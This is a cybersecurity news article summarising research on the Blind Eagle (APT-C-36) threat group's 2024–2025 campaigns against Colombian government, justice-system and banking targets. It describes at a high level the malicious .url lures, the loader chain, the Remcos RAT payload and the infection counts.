In a significant development in the cybersecurity landscape, APT-C-36, more commonly known as Blind Eagle, has intensified its operations targeting Colombian governmental, financial, and critical infrastructure organizations.
Active since 2018, this Advanced Persistent Threat group has recently expanded its arsenal with sophisticated exploit techniques and malware, demonstrating an alarming ability to adapt to evolving security measures.
The threat actor has infected more than 1,600 victims in a single campaign, highlighting the scale and effectiveness of their operations.
Blind Eagle has demonstrated remarkable agility in incorporating new exploits into its attack methods.
On November 12, 2024, Microsoft patched a newly discovered vulnerability, CVE-2024-43451, which was being actively exploited in the wild using malicious .url files.
Within just six days of the patch release, Blind Eagle had already integrated a variant of this exploit into its attack arsenal.
This variant differs from the original exploit in that it doesn’t expose the NTLMv2 hash but instead serves as a notification mechanism for the threat actors when a targeted user downloads the malicious file.
The group’s ability to rapidly adapt to newly disclosed vulnerabilities underscores their technical sophistication and persistent threat capabilities.
The malicious .url files are particularly effective because they can trigger WebDAV requests on unpatched machines through unusual user interactions such as right-clicking, deleting, or dragging the file.
Even on patched systems, these files can still lead to malware infection if a user manually clicks on them.
Despite being in use for over two months, many of these .url files remain undetected by antivirus engines on VirusTotal, allowing Blind Eagle to maintain stealth in their operations.
The group’s tactics now include leveraging legitimate file-sharing platforms like Google Drive, Dropbox, GitHub, and Bitbucket to distribute their malware, further complicating detection efforts by security tools.
Campaign Infrastructure and Sophisticated Malware Chain
Between December 2024 and February 2025, Blind Eagle conducted multiple campaigns identified by internal codenames such as “socialismo,” “miami,” “PARAISO,” “marte,” and “saturno”.
These campaigns utilized a consistent attack chain: malicious .url files delivered via email (often through compromised Google Drive accounts) would download a HeartCrypt-packed malware.
This malware would then extract and inject a packed .NET loader into legitimate Windows processes like csc.exe, ultimately delivering a .NET Remote Access Trojan (RAT) that appears to be a variant of PureCrypter1.
The technical sophistication continues throughout the attack chain. The .NET RAT collects detailed information about the victim’s system, including username, operating system version, installed antivirus, and machine specifications.
This data is then encrypted using AES and sent to command and control (C&C) servers with domain names that frequently change but often resolve to the same IP addresses.
In response, the C&C server provides a URL for downloading the final payload – typically Remcos RAT – which is hosted on GitHub or BitBucket repositories maintained by the attackers.
Analysis of the GitHub repository “Oscarito20222/file” revealed that all repository updates were committed in the UTC-5 timezone, potentially indicating Blind Eagle’s origin in South American countries.
This repository would be regularly updated with new malicious executables, then deleted after use, demonstrating the group’s operational security consciousness.
Notably, on February 25, 2025, the group accidentally uploaded an HTML file containing personally identifiable information (PII) from previous phishing activities, revealing their targeting of Colombian bank customers and confirming the focus on Colombian victims.
Severe Impact on Colombian Public and Private Sectors
The impact of Blind Eagle’s campaigns has been substantial, particularly on Colombian governmental organizations.
Based on filenames of malicious .url files, the group has been specifically targeting various Colombian justice system entities, including courts handling criminal cases, labor disputes, and security measures.
The malicious filenames mimic official legal communications, such as notifications of hearings, judicial complaints, and protective orders, exploiting the trust in governmental communications to increase the likelihood of victim interaction.
In the December 2024 “PARAISO” campaign alone, more than 1,600 Colombian systems were infected with Remcos RAT.
facturacioncol/fact Bitbucket repository.Considering the targeted nature of APT groups like Blind Eagle, this infection rate is particularly significant and demonstrates their effectiveness.
The total infections across campaigns occurring over just one week in December approximated 9,000, revealing the extensive reach of their operations.
A data leak from the group’s operations exposed over 8,400 entries of personally identifiable information collected through phishing campaigns impersonating Colombian banks.
From the 1,634 identified email addresses, five belonged to Colombian government agencies, including the national police, tax authority, and comptroller’s office.
This indicates Blind Eagle’s persistent targeting of governmental entities alongside financial institutions and private citizens, creating a comprehensive threat to Colombia’s national security and economic stability.
Check Point Research, which has been monitoring Blind Eagle’s activities, notes that the group remains one of the most active and dangerous threat actors in Latin America.
Their rapid evolution, effective social engineering tactics, and focus on both public and private sector entities require organizations to implement proactive threat intelligence, advanced security defenses, and continuous monitoring to mitigate the risk posed by this adaptable adversary.
Are you from SOC/DFIR Teams?: Analyse Malware Incidents & get live Access with ANY.RUN ->Â Start Now for Free.Â
